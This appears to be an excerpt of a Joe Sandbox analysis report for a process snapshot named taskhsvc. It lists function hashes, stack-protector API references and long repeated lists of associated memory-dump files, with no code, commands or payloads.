Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: b37672cf9e2020fcc055493d3d1f65162155b67e59cf62a1f21d9032f2baddeb
Instruction ID: 6084f88141c6d75fcd39d4e8d10ddcdb7952901dfdfa54f5ae1faae32a5a7ee4
Opcode Fuzzy Hash: b37672cf9e2020fcc055493d3d1f65162155b67e59cf62a1f21d9032f2baddeb
Instruction Fuzzy Hash: 76F09274E042199BCB04EFA8C8457AEBBF0FF48304F048919E955AB350D778A901DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6761 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00EF587B: __stack_chk_fail.LIBSSP-0 ref: 00EF59BE

__stack_chk_fail.LIBSSP-0 ref: 00EE67E8

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 07683be0700a510bedf555a0a0443544bdb9f34dd148357aaccd598dc2a1cd2e
Instruction ID: b98e44244ea5137f9b25400dce45595605dbf2b9c32fd1fb398b53b584901c88
Opcode Fuzzy Hash: 07683be0700a510bedf555a0a0443544bdb9f34dd148357aaccd598dc2a1cd2e
Instruction Fuzzy Hash: 74F0B274A046499FDF40EFADC98199DBBF0FB48348F108929E848E7305E338E8028F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE70E4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00EE7141: __stack_chk_fail.LIBSSP-0 ref: 00EE7214

__stack_chk_fail.LIBSSP-0 ref: 00EE713A

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: b2650022ba9a00897f25429e087dd0095bad598a8dbeee799114095699b3bac8
Instruction ID: 469817bc81db289822c33a6cba579347fbc64b9f64c47a0d5927f1fab49cd427
Opcode Fuzzy Hash: b2650022ba9a00897f25429e087dd0095bad598a8dbeee799114095699b3bac8
Instruction Fuzzy Hash: 5DF092B4A043499FCB40DFA9C585A8EBBF0FB48304F008819E898E7305E375A9458F91

Uniqueness

Uniqueness Score: -1.00%

Function 00E30A6B Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00DC21C1: abort.MSVCRT ref: 00DC2287

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E38186), ref: 00E30ABA

Memory Dump Source

Source File: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: 4a70fb131f1de11f5196ce7f14b35d1a5e210bfb1f156c8029293c8f11b0f741
Instruction ID: 8d5f246c9daabbfeee9240e79afcf941fc796401b66f59261dd14d68f2f0b3a2
Opcode Fuzzy Hash: 4a70fb131f1de11f5196ce7f14b35d1a5e210bfb1f156c8029293c8f11b0f741
Instruction Fuzzy Hash: 18F04DB4A043099FCB40DFACC585A9EBBF0EB08314F048859E858E7300E234A9118F65

Uniqueness

Uniqueness Score: -1.00%

Function 00D95FA6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00D97086: __stack_chk_fail.LIBSSP-0 ref: 00D97211

Part of subcall function 00E281BD: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00D96001), ref: 00E281E5

__stack_chk_fail.LIBSSP-0 ref: 00D963EC

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: c1b16415dc61353c519b7fbbe86c62f1190e109965ae05bc6755c2bd19983cd3
Instruction ID: e9527aaff28e12ab0cd71d0a6452b8731b5b77386844ce9eee71bdd36696d912
Opcode Fuzzy Hash: c1b16415dc61353c519b7fbbe86c62f1190e109965ae05bc6755c2bd19983cd3
Instruction Fuzzy Hash: CEF03A70208201DADB04BF61C14532EBBE0AF40758F08C80DB4DA8B2C2CBB9D045EB67

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6F50 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00EE6FAD: __stack_chk_fail.LIBSSP-0 ref: 00EE7080

__stack_chk_fail.LIBSSP-0 ref: 00EE6FA6

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
